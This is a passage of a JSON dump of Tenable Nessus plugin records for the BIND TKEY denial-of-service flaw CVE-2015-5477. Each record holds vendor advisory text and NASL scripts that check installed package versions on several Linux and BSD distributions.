or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-devel / bind97-libs / bind97-utils\");\n}\n", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:35", "description": "Jonathan Foote discovered that the BIND DNS server does not properly handle TKEY queries. A remote attacker can take advantage of this flaw to mount a denial of service via a specially crafted query triggering an assertion failure and causing BIND to exit.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Debian DLA-285-1 : bind9 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bind9", "p-cpe:/a:debian:debian_linux:bind9-doc", "p-cpe:/a:debian:debian_linux:bind9-host", "p-cpe:/a:debian:debian_linux:bind9utils", "p-cpe:/a:debian:debian_linux:dnsutils", "p-cpe:/a:debian:debian_linux:host", "p-cpe:/a:debian:debian_linux:libbind-dev", "p-cpe:/a:debian:debian_linux:libbind9-60", "p-cpe:/a:debian:debian_linux:libdns69", "p-cpe:/a:debian:debian_linux:libisc62", "p-cpe:/a:debian:debian_linux:libisccc60", "p-cpe:/a:debian:debian_linux:libisccfg62", "p-cpe:/a:debian:debian_linux:liblwres60", "p-cpe:/a:debian:debian_linux:lwresd", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-285.NASL", "href": "https://www.tenable.com/plugins/nessus/85052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-285-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85052);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Debian DLA-285-1 : bind9 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering\nan assertion failure and causing BIND to exit.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/07/msg00023.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/bind9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:dnsutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbind-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbind9-60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libdns69\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisc62\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisccc60\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:libisccfg62\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:liblwres60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bind9\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9-doc\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9-host\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9utils\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dnsutils\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"host\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbind-dev\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbind9-60\", 
reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libdns69\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisc62\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisccc60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisccfg62\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"liblwres60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lwresd\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:40", "description": "ISC reports :\n\nAn error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "FreeBSD : bind -- denial of service vulnerability (731cdeaa-3564-11e5-9970-14dae9d210b8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:bind910", "p-cpe:/a:freebsd:freebsd:bind910-base", "p-cpe:/a:freebsd:freebsd:bind99", "p-cpe:/a:freebsd:freebsd:bind99-base", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_731CDEAA356411E5997014DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/85066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database 
:\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85066);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FreeBSD\", value:\"SA-15:17.bind\");\n\n script_name(english:\"FreeBSD : bind -- denial of service vulnerability (731cdeaa-3564-11e5-9970-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC reports :\n\nAn error in the handling of TKEY queries can be exploited by an\nattacker for use as a denial-of-service vector, as a constructed\npacket can use the defect to trigger a REQUIRE assertion failure,\ncausing BIND to exit.\"\n );\n # https://kb.isc.org/article/AA-01272/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n # https://vuxml.freebsd.org/freebsd/731cdeaa-3564-11e5-9970-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?62ad7b09\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind910\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind910-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind99-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bind910<9.10.2P3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind99<9.9.7P2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind910-base>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind99-base>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:43", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. 
(CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bind97 on SL5.x i386/x86_64 (20150729)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind97", "p-cpe:/a:fermilab:scientific_linux:bind97-chroot", "p-cpe:/a:fermilab:scientific_linux:bind97-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind97-devel", "p-cpe:/a:fermilab:scientific_linux:bind97-libs", "p-cpe:/a:fermilab:scientific_linux:bind97-utils", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150729_BIND97_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85119);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Scientific Linux Security Update : bind97 on SL5.x i386/x86_64 (20150729)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. 
(CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1507&L=scientific-linux-errata&F=&S=&P=12946\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d505311\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:46", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "SUSE SLED11 / SLES11 Security Update : bind (SUSE-SU-2015:1304-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1304-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1304-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85121);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n 
script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : bind (SUSE-SU-2015:1304-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151304-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?52612bed\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-bind-12008=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP3 :\n\nzypper in -t patch sdksp3-bind-12008=1\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-bind-12008=1\n\nSUSE Linux Enterprise Server 
11-SP3 :\n\nzypper in -t patch slessp3-bind-12008=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-bind-12008=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-bind-12008=1\n\nSUSE Linux Enterprise Desktop 11-SP3 :\n\nzypper in -t patch sledsp3-bind-12008=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-bind-12008=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-bind-12008=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
